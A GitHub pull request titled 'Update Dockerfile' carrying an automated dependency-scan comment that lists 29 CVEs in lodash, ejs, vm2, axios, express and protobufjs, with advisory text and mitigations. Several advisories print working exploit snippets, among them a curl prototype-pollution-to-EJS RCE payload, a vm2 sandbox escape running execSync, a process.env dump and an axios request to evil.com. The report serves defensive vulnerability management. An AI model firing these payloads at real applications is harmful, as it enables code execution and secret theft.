Update Dockerfile

[shaniil]

No description provided.

[github-actions]

📗 Scan Summary

• Frogbot scanned for violations and found 31 issues

Scan Category	Status	Security Issues
Software Composition Analysis	✅ Done	29 Issues Found 10 Critical 8 High 11 Medium
Contextual Analysis	✅ Done	-
Static Application Security Testing (SAST)	✅ Done	2 Issues Found 1 High 1 Medium
Secrets	✅ Done	-
Infrastructure as Code (IaC)	✅ Done	Not Found

🚥 Policy Violations

🚨 Security Violations

Severity	ID	Contextual Analysis	Direct Dependencies	Impacted Dependency	Watch Name
Critical	CVE-2019-10744	Applicable	lodash:4.17.0	lodash:4.17.0	shani_ejs_build
Critical	CVE-2022-29078	Applicable	ejs:3.1.6	ejs:3.1.6	shani_ejs_build
Critical	CVE-2021-23555	Not Covered	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
High	CVE-2025-58754	Not Covered	pm2:5.3.0	axios:0.21.4	shani_ejs_build
Medium	CVE-2018-16487	Applicable	lodash:4.17.0	lodash:4.17.0	shani_ejs_build
Medium	CVE-2019-1010266	Not Covered	lodash:4.17.0	lodash:4.17.0	shani_ejs_build
Medium	CVE-2018-3721	Not Covered	lodash:4.17.0	lodash:4.17.0	shani_ejs_build
Medium	CVE-2024-43800	Not Covered	express:4.18.2	serve-static:1.15.0	shani_ejs_build
Medium	CVE-2024-43799	Not Covered	express:4.18.2	send:0.18.0	shani_ejs_build
Medium	CVE-2024-43796	Not Covered	express:4.18.2	express:4.18.2	shani_ejs_build
Medium	CVE-2024-29041	Not Covered	express:4.18.2	express:4.18.2	shani_ejs_build
Medium	CVE-2023-45857	Not Covered	pm2:5.3.0	axios:0.21.4	shani_ejs_build
Medium	CVE-2023-32313	Not Covered	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
Critical	CVE-2023-36665	Not Applicable	protobufjs:6.11.2	protobufjs:6.11.2	shani_ejs_build
Critical	CVE-2023-32314	Not Applicable	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
Critical	CVE-2023-30547	Not Applicable	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
Critical	CVE-2023-29199	Not Applicable	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
Critical	CVE-2023-29017	Not Applicable	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
Critical	CVE-2022-25893	Not Applicable	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
Critical	CVE-2022-36067	Not Applicable	vm2:3.9.4	vm2:3.9.4	shani_ejs_build
High	CVE-2025-27152	Not Applicable	pm2:5.3.0	axios:0.21.4	shani_ejs_build
High	CVE-2024-52798	Not Applicable	express:4.18.2	path-to-regexp:0.1.7	shani_ejs_build
High	CVE-2024-45590	Not Applicable	express:4.18.2	body-parser:1.20.1	shani_ejs_build
High	CVE-2024-45296	Not Applicable	express:4.18.2	path-to-regexp:0.1.7	shani_ejs_build
High	CVE-2022-25878	Not Applicable	protobufjs:6.11.2	protobufjs:6.11.2	shani_ejs_build
High	CVE-2021-23337	Not Applicable	lodash:4.17.0	lodash:4.17.0	shani_ejs_build
High	CVE-2020-8203	Not Applicable	lodash:4.17.0	lodash:4.17.0	shani_ejs_build
Medium	CVE-2024-33883	Not Applicable	ejs:3.1.6	ejs:3.1.6	shani_ejs_build
Medium	CVE-2020-28500	Not Applicable	lodash:4.17.0	lodash:4.17.0	shani_ejs_build

🔖 Details

[ CVE-2019-10744 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	High
Contextual Analysis:	Applicable
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.12]
CVSS V3:	9.1

Insufficient input validation in lodash defaultsDeep() leads to prototype pollution.

🔬 JFrog Research Details

Description:
lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

The function defaultsDeep was found to be vulnerable to prototype pollution, when accepting arbitrary source objects from untrusted input

Example of code vulnerable to this issue -

const lodash = require('lodash'); 
const evilsrc = {constructor: {prototype: {evilkey: "evilvalue"}}};
lodash.defaultsDeep({}, evilsrc)

Remediation:

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

[ CVE-2022-29078 ] ejs 3.1.6 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Medium
Contextual Analysis:	Applicable
Direct Dependencies:	ejs:3.1.6
Impacted Dependency:	ejs:3.1.6
Fixed Versions:	[3.1.7]
CVSS V3:	9.8

Insufficient input validation in EJS enables attackers to perform template injection when attacker can control the rendering options.

🔬 JFrog Research Details

Description:
Embedded JavaScript templates, also known as EJS, is one of the most popular Node.js templating engines, which is compiled with the Express JS view system.

When rendering views using EJS, it is possible to perform template injection on the opts.outputFunctionName variable, since the variable is injected into the template body without any escaping. Although it is unlikely that the attacker can directly control the outputFunctionName property, it is possible that it can be influenced in conjunction with a prototype pollution vulnerability.

Once template injection is achieved, the attacker can immediately perform remote code execution since the template engine (EJS) allows executing arbitrary JavaScript code.

Example of a vulnerable Node.js application -

const express = require('express');
const bodyParser = require('body-parser');
const lodash = require('lodash');
const ejs = require('ejs');

const app = express();

app
    .use(bodyParser.urlencoded({extended: true}))
    .use(bodyParser.json());

app.set('views', './');
app.set('view engine', 'ejs');

app.get("/", (req, res) => {
    res.render('index');
});

app.post("/", (req, res) => {
    let data = {};
    let input = JSON.parse(req.body.content);
    lodash.defaultsDeep(data, input);
    res.json({message: "OK"});
});

let server = app.listen(8086, '0.0.0.0', function() {
    console.log('Listening on port %d', server.address().port);
});

Exploiting the above example for RCE -
curl 127.0.0.1:8086 -v --data 'content={"constructor": {"prototype": {"outputFunctionName": "a; return global.process.mainModule.constructor._load(\"child_process\").execSync(\"whoami\"); //"}}}'

Due to the prototype pollution in the lodash.defaultsDeep call, an attacker can inject the outputFunctionName property with an arbitrary value. The chosen value executes an arbitrary process via the child_process module.

Remediation:

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

Note that this mitigation is supposed to stop any prototype pollution attacks which can allow an attacker to control the opts.outputFunctionName parameter indirectly.

The mitigation will not stop any (extremely unlikely) scenarios where the JavaScript code allows external input to directly affect opts.outputFunctionName.

[ CVE-2021-23555 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.6]
CVSS V3:	9.8

The package vm2 before 3.9.6 are vulnerable to Sandbox Bypass via direct access to host error objects generated by node internals during generation of a stacktraces, which can lead to execution of arbitrary code on the host machine.

[ CVE-2025-58754 ] axios 0.21.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	pm2:5.3.0
Impacted Dependency:	axios:0.21.4
Fixed Versions:	[1.12.0]
CVSS V3:	7.5

Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to version 1.11.0 runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response. This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'. Version 1.11.0 contains a patch for the issue.

[ CVE-2018-16487 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	High
Contextual Analysis:	Applicable
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.11]
CVSS V3:	5.6

Insufficient input validation in the Lodash library leads to prototype pollution.

🔬 JFrog Research Details

Description:
The Lodash library is an open-source JavaScript project that simplifies operations on string, arrays, numbers, and other objects. It is widely used in connected devices.

The merge, mergeWith, and defaultsDeep methods in Lodash are vulnerable to prototype pollution. Attackers can exploit this vulnerability by specifying a crafted sources parameter to any of these methods, which can modify the prototype properties of the Object, Function, Array, String, Number, and Boolean objects. A public exploit exists which performs the prototype pollution with an arbitrary key and value.

The library implementation has a bug in the safeGet() function in the lodash.js module that allows for adding or modifying prototype properties of various objects. The official solution fixes the bug by explicitly forbidding the addition or modification of prototype properties.

A related CVE (CVE-2018-3721) covers the same issue prior to Lodash version 4.17.5, but the fix for that was incomplete.

Remediation:

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

[ CVE-2019-1010266 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.11]
CVSS V3:	6.5

lodash prior to 4.17.11 is affected by: CWE-400: Uncontrolled Resource Consumption. The impact is: Denial of service. The component is: Date handler. The attack vector is: Attacker provides very long strings, which the library attempts to match using a regular expression. The fixed version is: 4.17.11.

[ CVE-2018-3721 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.5]
CVSS V3:	6.5

lodash node module before 4.17.5 suffers from a Modification of Assumed-Immutable Data (MAID) vulnerability via defaultsDeep, merge, and mergeWith functions, which allows a malicious user to modify the prototype of "Object" via proto, causing the addition or modification of an existing property that will exist on all objects.

[ CVE-2024-43800 ] serve-static 1.15.0 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	express:4.18.2
Impacted Dependency:	serve-static:1.15.0
Fixed Versions:	[1.16.0], [2.1.0]
CVSS V3:	4.7

serve-static serves static files. serve-static passes untrusted user input - even after sanitizing it - to redirect() may execute untrusted code. This issue is patched in serve-static 1.16.0.

[ CVE-2024-43799 ] send 0.18.0 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	express:4.18.2
Impacted Dependency:	send:0.18.0
Fixed Versions:	[0.19.0]
CVSS V3:	4.7

Send is a library for streaming files from the file system as a http response. Send passes untrusted user input to SendStream.redirect() which executes untrusted code. This issue is patched in send 0.19.0.

[ CVE-2024-43796 ] express 4.18.2 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	express:4.18.2
Impacted Dependency:	express:4.18.2
Fixed Versions:	[4.20.0], [5.0.0]
CVSS V3:	4.7

Express.js minimalist web framework for node. In express < 4.20.0, passing untrusted user input - even after sanitizing it - to response.redirect() may execute untrusted code. This issue is patched in express 4.20.0.

[ CVE-2024-29041 ] express 4.18.2 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	express:4.18.2
Impacted Dependency:	express:4.18.2
Fixed Versions:	[4.19.2], [5.0.0-beta.3]
CVSS V3:	6.1

Express.js minimalist web framework for node. Versions of Express.js prior to 4.19.0 and all pre-release alpha and beta versions of 5.0 are affected by an open redirect vulnerability using malformed URLs. When a user of Express performs a redirect using a user-provided URL Express performs an encode using encodeurl on the contents before passing it to the location header. This can cause malformed URLs to be evaluated in unexpected ways by common redirect allow list implementations in Express applications, leading to an Open Redirect via bypass of a properly implemented allow list. The main method impacted is res.location() but this is also called from within res.redirect(). The vulnerability is fixed in 4.19.2 and 5.0.0-beta.3.

[ CVE-2023-45857 ] axios 0.21.4 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	pm2:5.3.0
Impacted Dependency:	axios:0.21.4
Fixed Versions:	[0.28.0], [1.6.0]
CVSS V3:	6.5

An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

[ CVE-2023-32313 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Covered
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.18]
CVSS V3:	5.3

vm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node inspect method and edit options for console.log. As a result a threat actor can edit options for the console.log command. This vulnerability was patched in the release of version 3.9.18 of vm2. Users are advised to upgrade. Users unable to upgrade may make the inspect method readonly with vm.readonly(inspect) after creating a vm.

[ CVE-2023-36665 ] protobufjs 6.11.2 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	High
Contextual Analysis:	Not Applicable
Direct Dependencies:	protobufjs:6.11.2
Impacted Dependency:	protobufjs:6.11.2
Fixed Versions:	[6.11.4], [7.2.5]
CVSS V3:	9.8

Insufficient input validation in protobuf.js leads to multiple prototype pollution issues.

🔬 JFrog Research Details

Description:
Protocol Buffers or "protobufs" are a language-neutral, platform-neutral, extensible way of serializing structured data. protobuf.js is a JavaScript library that allows creating and consuming protobufs.
An incomplete fix for CVE-2022-25878 has been reported as CVE-2023-36665.

Multiple prototype pollution vulnerabilities were detected in the protobuf.js library. Namely these can occur when:

1. util.setProperty receives untrusted input in arguments 2 & 3 -

protobuf.util.setProperty({}, "constructor.prototype.verified", true);

2. ReflectionObject.setParsedOption receives untrusted input in arguments 2 & 3

let obj = new protobuf.ReflectionObject("Test");
obj.setParsedOption("unimportant!", attackerFunc, "constructor.prototype.testFn");

3. parse receives untrusted input (an untrusted .proto definition) -

protobuf.parse('option(a).constructor.prototype.verified = true;');

4. load receives an untrusted .proto file -

protobuf.loadSync("poc.proto");

an example malicious .proto file -
option(foo).constructor.prototype.verified = true;

While most prototype pollution attacks lead to denial of service, it has been reported that code execution is possible when unsanitized user input is provided to the functions util.setProperty or ReflectionObject.setParsedOption.

Remediation:

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

[ CVE-2023-32314 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.18]
CVSS V3:	10.0

A prototype lookup vulnerability in vm2 leads to arbitrary code execution when running untrusted input in the vm2 sandbox.

[ CVE-2023-30547 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.17]
CVSS V3:	10.0

A prototype lookup vulnerability in vm2 leads to arbitrary code execution when running untrusted input in the vm2 sandbox.

🔬 JFrog Research Details

Description:
vm2 is an open-source Node.js package that can be used for sandboxing untrusted code and creating isolated testing and development environments.
The vm2 package provides a secure virtual environment for running untrusted code, which cannot be escaped to the host machine.
However, a sandbox escape was discovered where untrusted code running inside the sandbox can escape and run arbitrary code on the host machine, even in the sandbox's default configuration.

To prevent the leaking of host context information into the virtual machine, the code given to the run() function is pre-processed and sanitized using the transformer() function before execution.
As a post-processing step, the code re-throws the sanitized exception inside a nested try-catch.

However, this may be proxied through a getPrototypeOf() proxy handler which can by itself throw an unsanitized host exception, resulting in the outer catch statement receiving it. This bypasses the sanitation and gains access to a pointer in the host context that may be exploited to run code outside the sandbox.

Example of running untrusted code in the sandbox -

const { VM } = require('vm2');
new VM().run(untrusted_code);

[ CVE-2023-29199 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.16]
CVSS V3:	10.0

Improper exception sanitization logic in vm2 leads to arbitrary code execution when running untrusted input in the vm2 sandbox.

🔬 JFrog Research Details

Description:
vm2 is an open-source Node.js package that can be used for sandboxing untrusted code and creating isolated testing and development environments.
The vm2 package provides a secure virtual environment for running untrusted code, which cannot be escaped to the host machine.
However, a sandbox escape was discovered where untrusted code running inside the sandbox can escape and run arbitrary code on the host machine, even in the sandbox's default configuration.

To prevent the leaking of host context information into the virtual machine, the code given to the run() function is pre-processed and sanitized using the transformer() function before execution. As a post-processing step, the ObjectPattern case replaces instances of $tmpname with the string value of tmpname (originally VM2_INTERNAL_TMPNAME). However, if the original code includes $tmpname in the catch condition, it can bypass the handleException() function and gain access to a pointer in the host context that may be exploited to run code in the host context.

Example of running untrusted code in the sandbox -

const { VM } = require('vm2');
new VM().run(untrusted_code);

Example of malicious code that triggers the issue when processed by the run() function:

aVM2_INTERNAL_TMPNAME = {};
function stack() {
    new Error().stack;
    stack();
}
try {
    stack();
} catch (a$tmpname) {
    a$tmpname.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');
}

Remediation:

Development mitigations

Prevent user code to contain $tmpname by replacing it with a not-empty string. Example:

const { VM } = require('vm2');
const vm = new VM();
const code = userInputCode();
...
const modifiedCode = code.replace(/$tmpname/g, 'myCustomName');
vm.run(modifiedCode);

[ CVE-2023-29017 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.15]
CVSS V3:	9.8

A prototype lookup vulnerability in vm2 leads to arbitrary code execution when running untrusted input in the vm2 sandbox.

🔬 JFrog Research Details

Description:
vm2 is an open-source Node.js package that can be used for sandboxing untrusted code and creating isolated testing and development environments.
However, a sandbox escape was discovered where untrusted code running inside the sandbox can escape and run arbitrary code on the host machine, even in the sandbox's default configuration.

Specifically, the frames object is an array in the new Node.js versions for handling async errors and can be accessed through the Error.prepareStackTrace object. This object wasn't converted to a sandbox object and could potentially allow access to the host object.

Example of running untrusted code in the sandbox -

const { VM } = require('vm2');
new VM().run(untrusted_code);

[ CVE-2022-25893 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.10]
CVSS V3:	9.8

A prototype lookup vulnerability in vm2 leads to arbitrary code execution when running untrusted input in the vm2 sandbox.

🔬 JFrog Research Details

Description:
[vm2][https://www.npmjs.com/package/vm2] is an open-source Node.js package that can be used for sandboxing untrusted code and creating isolated testing and development environments.

The vm2 package provides a secure virtual environment for running untrusted code, which cannot be escaped to the host machine.
However, a sandbox escape was discovered where untrusted code running inside the sandbox can escape and run arbitrary code on the host machine, even in the sandbox's default configuration.

Specifically, the WeakMap object can be accessed through the WeakMap.prototype.set method, allowing for the assignment of a {value: value} pair instead of a {key: value} using the global object.prototype.set method which is later assigned into the wrappedPrepareStack object. This can potentially allow access to the host object via the Error.prepareStackTrace object.

Vulnerable code snippet -

const { VM } = require('vm2');
new VM().run(untrusted_code);

Remediation:

Development mitigations

Prefix the untrusted code with Object.freeze(WeakMap.prototype) to prevent the prototype lookup -

new VM().run(
Object.freeze(WeakMap.prototype);

// Untrusted code here...
}

[ CVE-2022-36067 ] vm2 3.9.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	vm2:3.9.4
Impacted Dependency:	vm2:3.9.4
Fixed Versions:	[3.9.11]
CVSS V3:	10.0

Sandbox escape in vm2 leads to code execution when executing untrusted code.

🔬 JFrog Research Details

Description:
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. The sandbox is used for running untrusted code while not allowing the code to perform actions that will compromise the host machine, such as running arbitrary shell commands.

It was discovered that due to insecure error handling, an attacker could create code that runs inside the sandbox but eventually creates an object outside of the sandbox that would be subsequently executed. This allows the attacker to perform malicious operations such as execution arbitrary shell commands using the child_process module. Since the Sandbox by design is meant to run untrusted code, it is highly likely that this vulnerability can be exploited on every application that uses vm2.

The vulnerability has an extensive technical writeup, making the creation of a PoC trivial.

Example of running untrusted code in the sandbox -

const {VM} = require('vm2');
new VM().run(attacker_javascript_code_as_string);

Remediation:

Development mitigations

Define the global Error object before executing untrusted code in the sandbox -

const {VM} = require('vm2');
const vm2 = new VM();

// Define the Error object
vm2.sandbox.Error = Error;

// Now we can execute untrusted code
new VM().run(attacker_javascript_code_as_string);

[ CVE-2025-27152 ] axios 0.21.4 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	High
Contextual Analysis:	Not Applicable
Direct Dependencies:	pm2:5.3.0
Impacted Dependency:	axios:0.21.4
Fixed Versions:	[0.30.0], [1.8.2]
CVSS V3:	-

A design problem in Axios may lead to SSRF when using path-relative URLs.

🔬 JFrog Research Details

Description:
Axios is a promise-based HTTP client for node.js and the browser.

A relative URL is a link to a URL which uses a given base URL and by doing so ensures the user make requests only within the base URL. For example if a base URL http://example.com is given, and the user make a request to the relative //example_relative_url URL the request would be sent to http://example.com/example_relative_url.

Axios offers the developer the ability to allow/not allow making requests based on absolute URLs using the allowAbsoluteUrls attribute in the configuration . By setting this attribute to false the developer ensure any URLs given by the user will be used as a relative URL to their trusted base URL.

A bug in the buildFullPath function in the HTTP adapter cause the function to ignore the allowAbsoluteUrls attribute, and by doing so it allows the usage of absolute paths in requests. An attacker could take advantage of that fact in order to make a request to their malicious URL and send private information or download malicious code to the user server in SSRF attack. An example for a vulnerable piece of code:

const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');

[ CVE-2024-52798 ] path-to-regexp 0.1.7 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Contextual Analysis:	Not Applicable
Direct Dependencies:	express:4.18.2
Impacted Dependency:	path-to-regexp:0.1.7
Fixed Versions:	[0.1.12]
CVSS V3:	7.5

path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. The regular expression that is vulnerable to backtracking can be generated in the 0.1.x release of path-to-regexp. Upgrade to 0.1.12. This vulnerability exists because of an incomplete fix for CVE-2024-45296.

[ CVE-2024-45590 ] body-parser 1.20.1 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	High
Contextual Analysis:	Not Applicable
Direct Dependencies:	express:4.18.2
Impacted Dependency:	body-parser:1.20.1
Fixed Versions:	[1.20.3]
CVSS V3:	7.5

Insufficient input validation in body-parser may lead to denial of service when parsing a crafted request.

🔬 JFrog Research Details

Remediation:

Development mitigations

The vulnerability can be mitigated by specifying extended = false when initializing the URL-encoded parser.

[ CVE-2024-45296 ] path-to-regexp 0.1.7 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Medium
Contextual Analysis:	Not Applicable
Direct Dependencies:	express:4.18.2
Impacted Dependency:	path-to-regexp:0.1.7
Fixed Versions:	[0.1.10], [1.9.0], [3.3.0], [6.3.0], [8.0.0]
CVSS V3:	7.5

ReDoS in path-to-regexp may lead to denial of service when parsing crafted input.

🔬 JFrog Research Details

Remediation:

Development mitigations

This vulnerability can be mitigated by manually defining the parameter's regular expression when two or more parameters exist in a single segment. For example, /flights/:from-:to(\\w+) instead of /flights/:from-:to.

[ CVE-2022-25878 ] protobufjs 6.11.2 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	High
Contextual Analysis:	Not Applicable
Direct Dependencies:	protobufjs:6.11.2
Impacted Dependency:	protobufjs:6.11.2
Fixed Versions:	[6.11.3]
CVSS V3:	7.5

Insufficient input validation in protobuf.js leads to multiple prototype pollution issues.

🔬 JFrog Research Details

Description:
Protocol Buffers or "protobufs" are a language-neutral, platform-neutral, extensible way of serializing structured data. protobuf.js is a JavaScript library that allows creating and consuming protobufs.
Multiple prototype pollution vulnerabilities were detected in the protobuf.js library. Namely these can occur when:

1. util.setProperty receives untrusted input in arguments 2 & 3 -

protobuf.util.setProperty({}, "__proto__.someprop", "somevalue");

2. ReflectionObject.setParsedOption receives untrusted input in arguments 2 & 3

let obj = new protobuf.ReflectionObject("Test")
obj.setParsedOption({}, "somevalue", "__proto__.someprop");

3. parse receives untrusted input (an untrusted .proto definition) -

let p = `option (foo).__proto__.someprop= "somevalue";` 
protobuf.parse(p)

4. load receives an untrusted .proto file -

protobuf.load("/path/to/untrusted.proto", function(err, root) { ... });

Remediation:

Development mitigations

Add the Object.freeze(Object.prototype); directive once at the beginning of your main JS source code file (ex. index.js), preferably after all your require directives. This will prevent any changes to the prototype object, thus completely negating prototype pollution attacks.

[ CVE-2021-23337 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Medium
Contextual Analysis:	Not Applicable
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.21]
CVSS V3:	7.2

Improper sanitization in the lodash template function leads to JavaScript code injection through the options argument.

🔬 JFrog Research Details

Description:
JavaScript-based applications (both frontend and backend) that use the template function -_.template([string=''], [options={}]) from the lodash utility library and provide the options argument (specifically the variable option) from untrusted user input, are vulnerable to JavaScript code injection. This issue can be easily exploited, and an exploitation example is publicly available in the fix tests that was introduced in version 4.17.21 -

lodash.template('', { variable: '){console.log(process.env)}; with(obj' })()

[ CVE-2020-8203 ] lodash 4.17.0 (shani_ejs_build)

Violation Details

Policies:	shani_ejs_build, shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Critical
Contextual Analysis:	Not Applicable
Direct Dependencies:	lodash:4.17.0
Impacted Dependency:	lodash:4.17.0
Fixed Versions:	[4.17.19]
CVSS V3:	7.4

Prototype pollution in lodash object merging and zipping functions leads to code injection.

🔬 JFrog Research Details

Description:
lodash is a JavaScript library which provides utility functions for common programming tasks.

JavaScript frontend and Node.js-based backend applications that merge or zip objects using the lodash functions mergeWith, merge and zipObjectDeep are vulnerable to prototype pollution if one or more of the objects it receives as arguments are obtained from user input.
An attacker controlling this input given to the vulnerable functions can inject properties to JavaScript special objects such as Object.prototype from which all JavaScript objects inherit properties and methods. Any change on Object.prototype properties will then propagate through the prototype chain inheritance to all of the objects in a JavaScript application. This in turn would allow an attacker to add new properties or modify existing properties which will have application specific implications that could lead to DoS (denial of service), authentication bypass, privilege escalation and even RCE (remote code execution) in some cases.
As an example for privilege escalation, consider a JavaScript application that has a user object which has a Boolean property of user.isAdmin which is used to decide which actions the user may take. If an attacker can modify or add the isAdmin property through prototype pollution, it can escalate the privileges of its own user to those of an admin.
As exploitation is usually application specific, successful exploitation is much more likely if an attacker have access to the JavaScript application code. As such, frontend applications are more vulnerable to this vulnerability than Node.js backend applications.

Remediation:

Deployment mitigations

As general guidelines against prototype pollution, first consider not merging objects originating from user input or using a Map structure instead of an object. If merging objects is needed, look into creating objects without a prototype with Object.create(null) or into freezing Object.prototype with Object.freeze(). Finally, it is always best to perform input validation with a a JSON schema validator, which could mitigate this issue entirely in many cases.

[ CVE-2024-33883 ] ejs 3.1.6 (shani_ejs_build)

Violation Details

Policies:	shani-npm-cli
Watch Name:	shani_ejs_build
Jfrog Research Severity:	Medium
Contextual Analysis:	Not Applicable
Direct Dependencies:	ejs:3.1.6
Impacted Dependency:	ejs:3.1.6
Fixed Versions:	[3.1.10]
CVSS V3:	4.0

Insufficient input validation in EJS may lead to prototype pollution.

🔬 JFrog Research Details

Description:
Embedded JavaScript templates, also known as EJS, is one of the most popular Node.js templating engines, which is compiled with the Express JS view system.

A prototype pollution gadget within the EJS template engine could potentially be leveraged by attackers to achieve remote code execution or DoS via prototype pollution.

function Template(text, opts) {
  opts = opts || utils.createNullProtoObjWherePossible();

When checking for the presence of a property within an object variable, the lookup scope isn't explicitly defined. In JavaScript, the absence of a defined lookup scope prompts a search up to the root prototype (Object.prototype). This could potentially be under the control of an attacker if another prototype pollution vulnerability is present within the application.

If the application server is using the EJS as the backend template engine, and there is another prototype pollution vulnerability in the application, then the attacker could leverage the found gadgets in the EJS template engine to escalate the prototype pollution to remote code execution or DoS.

